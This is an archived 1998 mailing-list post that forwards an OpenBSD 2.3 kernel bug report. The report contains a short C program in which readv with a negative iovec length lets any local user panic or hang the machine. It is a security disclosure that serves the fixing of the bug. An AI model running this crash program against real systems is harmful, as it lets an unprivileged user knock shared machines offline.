Fwd: Any user can panic OpenBSD machine

From: Michael Fuhr (mfuhrat_private)
Date: Mon Jul 27 1998 - 10:23:59 PDT

Next message: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"

Previous message: Aleph One: "Microsoft Security Bulletin (MS98-008)"
Next in thread: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Graff: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: David Maxwell: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Todd C. Miller: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Fuhr: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Dag-Erling Coidan Smørgrav: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Peter Jeremy: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Warner Losh: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Todd C. Miller: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Dag-Erling Coidan Smørgrav: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Angelos D. Keromytis: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Felix Schroeter: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: J.R. Valverde: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Joshua Cope: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: David Shaw: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Kragen: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Peter W: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Gert Doering: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Jennings: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: David Maxwell: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Jennings: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Alfred Huger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Jennings: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Timothy J Luoma: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Kragen: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Cy Schubert: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Todd C. Miller: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: der Mouse: "Re: Fwd: Any user can panic OpenBSD machine"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----Forwarded message from jonat_private-----

Message-Id: <199807271126.MAA16724at_private>
Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
From: jonat_private
To: gnatsat_private
X-Send-Pr-Version: 3.97
Subject: kernel/549: Any user can panic OpenBSD machine
Sender: owner-bugsat_private


>Number:         549
>Category:       kernel
>Synopsis:       readv with -ve block size panics kernel
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon Jul 27 05:40:02 MDT 1998
>Last-Modified:
>Originator:     Jon Ribbens
>Organization:
\/ Jon Ribbens / jonat_private
>Release:        2.3
>Environment:

        System      : OpenBSD 2.3
        Architecture: OpenBSD.i386
        Machine     : i386
>Description:
        readv with one of the blocks having a -ve size panics the kernel.
        Oops.

>How-To-Repeat:

#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void) {
  struct iovec iov[1];
  char buffer[1024];

  iov[0].iov_base = buffer;
  iov[0].iov_len = -1;

  return readv(0, iov, 1);
}

        run the above program, type a few characters, press return, observe
        either kernel panic or machine hang. panic message is
        "panic: ureadc: non-positive resid". Any user can do this.


>Fix:
        Dunno I'm afraid.


>Audit-Trail:
>Unformatted:

-----End of forwarded message-----

--
Michael Fuhr
http://www.fuhr.net/~mfuhr/

Next message: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"
Previous message: Aleph One: "Microsoft Security Bulletin (MS98-008)"
Next in thread: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Graff: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: David Maxwell: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Todd C. Miller: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Fuhr: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Dag-Erling Coidan Smørgrav: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Peter Jeremy: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Warner Losh: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Todd C. Miller: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Dag-Erling Coidan Smørgrav: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Angelos D. Keromytis: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Felix Schroeter: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: J.R. Valverde: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Joshua Cope: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: David Shaw: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Kragen: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Peter W: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Gert Doering: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Jennings: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: David Maxwell: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Jason Thorpe: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Jennings: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Alfred Huger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Michael Jennings: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Timothy J Luoma: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Kragen: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Theo de Raadt: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Cy Schubert: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Perry E. Metzger: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Chris Wedgwood: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: Todd C. Miller: "Re: Fwd: Any user can panic OpenBSD machine"
Reply: der Mouse: "Re: Fwd: Any user can panic OpenBSD machine"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:08:24 PDT